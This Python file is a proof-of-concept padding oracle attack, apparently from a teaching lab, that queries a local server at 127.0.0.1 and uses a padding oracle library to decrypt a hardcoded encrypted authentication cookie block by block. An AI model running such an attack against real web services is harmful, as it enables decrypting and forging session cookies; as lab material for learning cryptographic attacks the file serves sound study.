PaddingOracles/code/poc_po1.py

from base64 import b64encode, b64decode
from padd0r import PaddingOracle, Encoding
import requests
import logging

# disable logging
logging.getLogger("requests").setLevel(logging.CRITICAL)
logging.getLogger("urllib3").setLevel(logging.WARNING)

# Set the admin cookie!
admin_cookie = ""

def oracle(ct):

    url = "http://127.0.0.1:5000/po1"

    data = {
        "auth":b64encode(ct).decode("utf-8")
    }

    text = requests.get(url, cookies=data).text

    # distinguish between a padding error and a valid padding
    # dont forget to return true on a valid padding and false on a wrong padding
    if "PaddingError" in text:
        return False
    return True


ac = "jAJBizDAZZLtRw4WEM2Q4DFZeRbeQX791w5fis8Pyx2nXI8NpxpUHffLw67fIHEH+mrGDs81tyASQGKII6jyIq4u3iFYUap73xd4Xt+E0Cw5aJHuEc/OKNeCSQRrY6+nFcCg//304sx9y2wJDqT9pYOdxbGdca0OgmHSAzodx9g="


def decrypt(cookie):
    #                   ciphertext
    #                           verbosity can be 1 or 2
    #                                       which encodings are realistic?
    #                                                               pass the oracle functions as parameter
    po = PaddingOracle(cookie, BS=16, verbosity=2, encoding=Encoding.b64, oracle=oracle)
    po.set_output("hex")

    # decrypt the blocks
    po.decrypt_all_blocks()

    #po.decrypt_last_block()
    #po.decrypt_block_at_index(7)

decrypt(ac)